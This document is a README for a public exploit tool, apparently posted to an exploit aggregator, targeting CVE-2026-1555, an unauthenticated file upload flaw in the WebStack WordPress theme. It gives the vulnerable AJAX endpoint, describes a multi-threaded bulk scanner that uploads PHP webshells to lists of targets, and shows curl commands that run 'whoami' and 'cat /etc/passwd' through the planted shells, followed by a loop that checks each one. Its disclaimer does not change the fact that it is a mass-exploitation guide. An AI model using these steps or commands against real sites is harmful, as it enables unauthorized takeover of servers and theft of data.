## https://sploitus.com/exploit?id=D7138864-4320-5F01-874C-DBD7EC266442
# CVE-2026-1555
WebStack <= 1.2024 - Unauthenticated Arbitrary File Upload
# ๐ค By: [Nxploited](https://github.com/Nxploited)
### ๐ Nxploited ZeroDay Hub โ [t.me/KNxploited](https://t.me/KNxploited)
---
# ๐ CVE-2026-1555 โ WebStack WordPress Arbitrary File Upload
**Unauthenticated Remote Code Execution via `img_upload` AJAX handler**




---
## ๐ Vulnerability Overview
| Field | Detail |
|---|---|
| **CVE ID** | CVE-2026-1555 |
| **Affected Component** | WebStack Theme for WordPress |
| **Vulnerable Versions** | All versions up to and including **1.2024** |
| **Vulnerability Type** | Arbitrary File Upload โ Remote Code Execution |
| **Authentication Required** | โ None (Unauthenticated) |
| **CVSS Score** | **9.8 CRITICAL** |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
### ๐ฌ Technical Root Cause
The `io_img_upload()` function registered under the WordPress `admin-ajax.php` action hook `img_upload` performs **zero file type or extension validation** before writing the uploaded file to the server. Because the action is registered without authentication checks (`wp_ajax_nopriv_`), any unauthenticated remote attacker can POST an arbitrary file โ including a PHP webshell โ and the server will store it in a publicly accessible path, enabling direct Remote Code Execution.
**Vulnerable endpoint:**
```
POST /wp-admin/admin-ajax.php
action=img_upload
files=@
```
---
## โ๏ธ Tool Features
- ๐ Multi-threaded scanning with configurable worker count
- ๐ Bulk target support via a target list file
- ๐ค Automatic shell URL extraction from JSON response
- ๐พ Successful shell URLs saved to `uploaded_paths.txt`
- ๐จ Rich terminal UI with live progress tracking
- ๐ SSL verification suppressed for maximum compatibility
---
## ๐ฆ Requirements
**Python version:** `3.8+`
Install dependencies:
```bash
pip install requests rich urllib3
```
---
## ๐ Usage
### 1. Prepare your target list
Create a file named `list.txt` (or any name you prefer) with one target per line:
```
https://target1.com
https://target2.com
http://target3.com
```
> Targets without `http://` or `https://` are automatically prefixed with `http://`.
### 2. Prepare your payload
Place your webshell in the **same directory** as the script. Example:
```bash
# Minimal PHP webshell
echo '' > shell.php
```
### 3. Run the tool
```bash
python CVE-2026-1555.py
```
You will be prompted for:
| Prompt | Description | Default |
|---|---|---|
| `Targets file` | Path to your targets list | `list.txt` |
| `Threads` | Number of concurrent workers | `6` |
| `Local file to upload` | Filename of your payload (in script dir) | `shell.php` |
---
## ๐ค Output & Shell Extraction
### Live Output
Each successful upload prints:
```
โญโ IMG_UPLOAD โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ Upload successful โ
โ โ
โ Target: https://target.com โ
โ Shell URL: https://target.com/wp-content/... โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
```
### Saved Results
All successful shell URLs are appended to:
```
uploaded_paths.txt
```
### Accessing Your Shell
After a successful upload, access the shell directly via browser or curl:
```bash
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id
# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"
# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"
```
> The exact upload path is extracted from the server's JSON response (`data.src`) and printed automatically.
### Bulk Shell Verification
Quickly verify all uploaded shells from the output file:
```bash
while read url; do
echo -n "[*] $url -> "
curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done **This tool is provided strictly for authorized penetration testing, security research, and educational purposes only.**
>
> The author โ **Nxploited** โ holds **no responsibility** for any misuse, damage, or illegal activity carried out using this tool. By using this tool, you confirm that you have explicit written permission to test all target systems.
>
> Unauthorized use against systems you do not own or have explicit permission to test is **illegal** and may result in criminal prosecution under applicable cybercrime laws.
>
> **Use responsibly. You are solely accountable for your actions.**
---
**๐ค Author:** [Nxploited](https://github.com/Nxploited)
**๐ฃ Channel:** [Nxploited ZeroDay Hub](https://t.me/KNxploited)
**๐ฌ Telegram:** [@KNxploited](https://t.me/KNxploited)